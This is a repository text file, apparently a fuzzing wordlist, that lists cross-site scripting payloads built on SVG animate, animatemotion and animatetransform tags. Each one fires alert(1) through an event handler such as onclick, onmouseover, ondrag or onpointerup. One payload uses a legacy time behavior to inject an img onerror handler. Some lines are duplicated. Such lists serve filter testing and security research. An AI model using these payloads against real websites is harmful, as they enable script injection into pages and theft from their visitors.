-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathanimate.txt
146 lines (145 loc) · 9.5 KB
/
animate.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
<animate draggable="true" ondrag="alert(1)">test</animate>
<animate draggable="true" ondragend="alert(1)">test</animate>
<animate draggable="true" ondragenter="alert(1)">test</animate>
<animate draggable="true" ondragleave="alert(1)">test</animate>
<animate draggable="true" ondragstart="alert(1)">test</animate>
<animate id=x tabindex=1 onactivate=alert(1)></animate>
<animate id=x tabindex=1 onbeforeactivate=alert(1)></animate>
<animate id=x tabindex=1 onbeforedeactivate=alert(1)></animate><input autofocus>
<animate id=x tabindex=1 ondeactivate=alert(1)></animate><input id=y autofocus>
<animate onafterscriptexecute=alert(1)><script>1</script>
<animate onbeforescriptexecute=alert(1)><script>1</script>
<animate onclick="alert(1)">test</animate>
<animate oncontextmenu="alert(1)">test</animate>
<animate oncopy=alert(1) value="XSS" autofocus tabindex=1>test
<animate oncut=alert(1) value="XSS" autofocus tabindex=1>test
<animate ondblclick="alert(1)" autofocus tabindex=1>test</animate>
<animate onkeydown="alert(1)" contenteditable>test</animate>
<animate onkeypress="alert(1)" contenteditable>test</animate>
<animate onkeyup="alert(1)" contenteditable>test</animate>
<animate onmousedown="alert(1)">test</animate>
<animate onmouseenter="alert(1)">test</animate>
<animate onmouseleave="alert(1)">test</animate>
<animate onmousemove="alert(1)">test</animate>
<animate onmouseout="alert(1)">test</animate>
<animate onmouseover="alert(1)">test</animate>
<animate onmouseup="alert(1)">test</animate>
<animate onmousewheel=alert(1)>requires scrolling
<animate onpointerdown=alert(1)>XSS</animate>
<animate onpointerenter=alert(1)>XSS</animate>
<animate onpointerleave=alert(1)>XSS</animate>
<animate onpointermove=alert(1)>XSS</animate>
<animate onpointerout=alert(1)>XSS</animate>
<animate onpointerover=alert(1)>XSS</animate>
<animate onpointerrawupdate=alert(1)>XSS</animate>
<animate onpointerup=alert(1)>XSS</animate>
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>>
<animatemotion draggable="true" ondrag="alert(1)">test</animatemotion>
<animatemotion draggable="true" ondragend="alert(1)">test</animatemotion>
<animatemotion draggable="true" ondragenter="alert(1)">test</animatemotion>
<animatemotion draggable="true" ondragleave="alert(1)">test</animatemotion>
<animatemotion draggable="true" ondragstart="alert(1)">test</animatemotion>
<animatemotion id=x tabindex=1 onactivate=alert(1)></animatemotion>
<animatemotion id=x tabindex=1 onbeforeactivate=alert(1)></animatemotion>
<animatemotion id=x tabindex=1 onbeforedeactivate=alert(1)></animatemotion><input autofocus>
<animatemotion id=x tabindex=1 ondeactivate=alert(1)></animatemotion><input id=y autofocus>
<animatemotion onafterscriptexecute=alert(1)><script>1</script>
<animatemotion onbeforescriptexecute=alert(1)><script>1</script>
<animatemotion onclick="alert(1)">test</animatemotion>
<animatemotion oncontextmenu="alert(1)">test</animatemotion>
<animatemotion oncopy=alert(1) value="XSS" autofocus tabindex=1>test
<animatemotion oncut=alert(1) value="XSS" autofocus tabindex=1>test
<animatemotion ondblclick="alert(1)" autofocus tabindex=1>test</animatemotion>
<animatemotion onkeydown="alert(1)" contenteditable>test</animatemotion>
<animatemotion onkeypress="alert(1)" contenteditable>test</animatemotion>
<animatemotion onkeyup="alert(1)" contenteditable>test</animatemotion>
<animatemotion onmousedown="alert(1)">test</animatemotion>
<animatemotion onmouseenter="alert(1)">test</animatemotion>
<animatemotion onmouseleave="alert(1)">test</animatemotion>
<animatemotion onmousemove="alert(1)">test</animatemotion>
<animatemotion onmouseout="alert(1)">test</animatemotion>
<animatemotion onmouseover="alert(1)">test</animatemotion>
<animatemotion onmouseup="alert(1)">test</animatemotion>
<animatemotion onmousewheel=alert(1)>requires scrolling
<animatemotion onpointermove=alert(1)>XSS</animatemotion>
<animatemotion onpointerout=alert(1)>XSS</animatemotion>
<animatemotion onpointerover=alert(1)>XSS</animatemotion>
<animatemotion onpointerrawupdate=alert(1)>XSS</animatemotion>
<animatemotion onpointerup=alert(1)>XSS</animatemotion>
<animatetransform draggable="true" ondrag="alert(1)">test</animatetransform>
<animatetransform draggable="true" ondragend="alert(1)">test</animatetransform>
<animatetransform draggable="true" ondragenter="alert(1)">test</animatetransform>
<animatetransform draggable="true" ondragleave="alert(1)">test</animatetransform>
<animatetransform draggable="true" ondragstart="alert(1)">test</animatetransform>
<animatetransform id=x tabindex=1 onactivate=alert(1)></animatetransform>
<animatetransform id=x tabindex=1 onbeforeactivate=alert(1)></animatetransform>
<animatetransform id=x tabindex=1 onbeforedeactivate=alert(1)></animatetransform><input autofocus>
<animatetransform id=x tabindex=1 ondeactivate=alert(1)></animatetransform><input id=y autofocus>
<animatetransform onafterscriptexecute=alert(1)><script>1</script>
<animatetransform onbeforescriptexecute=alert(1)><script>1</script>
<animatetransform onclick="alert(1)">test</animatetransform>
<animatetransform oncontextmenu="alert(1)">test</animatetransform>
<animatetransform oncopy=alert(1) value="XSS" autofocus tabindex=1>test
<animatetransform oncut=alert(1) value="XSS" autofocus tabindex=1>test
<animatetransform ondblclick="alert(1)" autofocus tabindex=1>test</animatetransform>
<animatetransform onkeydown="alert(1)" contenteditable>test</animatetransform>
<animatetransform onkeypress="alert(1)" contenteditable>test</animatetransform>
<animatetransform onkeyup="alert(1)" contenteditable>test</animatetransform>
<animatetransform onmousedown="alert(1)">test</animatetransform>
<animatetransform onmouseenter="alert(1)">test</animatetransform>
<animatetransform onmouseleave="alert(1)">test</animatetransform>
<animatetransform onmousemove="alert(1)">test</animatetransform>
<animatetransform onmouseout="alert(1)">test</animatetransform>
<animatetransform onmouseover="alert(1)">test</animatetransform>
<animatetransform onmouseup="alert(1)">test</animatetransform>
<animatetransform onmousewheel=alert(1)>requires scrolling
<animatetransform onpointerdown=alert(1)>XSS</animatetransform>
<animatetransform onpointerenter=alert(1)>XSS</animatetransform>
<animatetransform onpointerleave=alert(1)>XSS</animatetransform>
<animatetransform onpointermove=alert(1)>XSS</animatetransform>
<animatetransform onpointerout=alert(1)>XSS</animatetransform>
<animatetransform onpointerover=alert(1)>XSS</animatetransform>
<animatetransform onpointerrawupdate=alert(1)>XSS</animatetransform>
<animatetransform onpointerup=alert(1)>XSS</animatetransform><animatemotion onpointerdown=alert(1)>XSS</animatemotion>
<animatemotion onpointerenter=alert(1)>XSS</animatemotion>
<animatemotion onpointerleave=alert(1)>XSS</animatemotion>
<animatemotion onpointermove=alert(1)>XSS</animatemotion>
<animatemotion onpointerout=alert(1)>XSS</animatemotion>
<animatemotion onpointerover=alert(1)>XSS</animatemotion>
<animatemotion onpointerrawupdate=alert(1)>XSS</animatemotion>
<animatemotion onpointerup=alert(1)>XSS</animatemotion>
<animatetransform draggable="true" ondrag="alert(1)">test</animatetransform>
<animatetransform draggable="true" ondragend="alert(1)">test</animatetransform>
<animatetransform draggable="true" ondragenter="alert(1)">test</animatetransform>
<animatetransform draggable="true" ondragleave="alert(1)">test</animatetransform>
<animatetransform draggable="true" ondragstart="alert(1)">test</animatetransform>
<animatetransform id=x tabindex=1 onactivate=alert(1)></animatetransform>
<animatetransform id=x tabindex=1 onbeforeactivate=alert(1)></animatetransform>
<animatetransform id=x tabindex=1 onbeforedeactivate=alert(1)></animatetransform><input autofocus>
<animatetransform id=x tabindex=1 ondeactivate=alert(1)></animatetransform><input id=y autofocus>
<animatetransform onafterscriptexecute=alert(1)><script>1</script>
<animatetransform onbeforescriptexecute=alert(1)><script>1</script>
<animatetransform onclick="alert(1)">test</animatetransform>
<animatetransform oncontextmenu="alert(1)">test</animatetransform>
<animatetransform oncopy=alert(1) value="XSS" autofocus tabindex=1>test
<animatetransform oncut=alert(1) value="XSS" autofocus tabindex=1>test
<animatetransform ondblclick="alert(1)" autofocus tabindex=1>test</animatetransform>
<animatetransform onkeydown="alert(1)" contenteditable>test</animatetransform>
<animatetransform onkeypress="alert(1)" contenteditable>test</animatetransform>
<animatetransform onkeyup="alert(1)" contenteditable>test</animatetransform>
<animatetransform onmousedown="alert(1)">test</animatetransform>
<animatetransform onmouseenter="alert(1)">test</animatetransform>
<animatetransform onmouseleave="alert(1)">test</animatetransform>
<animatetransform onmousemove="alert(1)">test</animatetransform>
<animatetransform onmouseout="alert(1)">test</animatetransform>
<animatetransform onmouseover="alert(1)">test</animatetransform>
<animatetransform onmouseup="alert(1)">test</animatetransform>
<animatetransform onmousewheel=alert(1)>requires scrolling
<animatetransform onpointerdown=alert(1)>XSS</animatetransform>
<animatetransform onpointerenter=alert(1)>XSS</animatetransform>
<animatetransform onpointerleave=alert(1)>XSS</animatetransform>
<animatetransform onpointermove=alert(1)>XSS</animatetransform>
<animatetransform onpointerout=alert(1)>XSS</animatetransform>
<animatetransform onpointerover=alert(1)>XSS</animatetransform>
<animatetransform onpointerrawupdate=alert(1)>XSS</animatetransform>
<animatetransform onpointerup=alert(1)>XSS</animatetransform>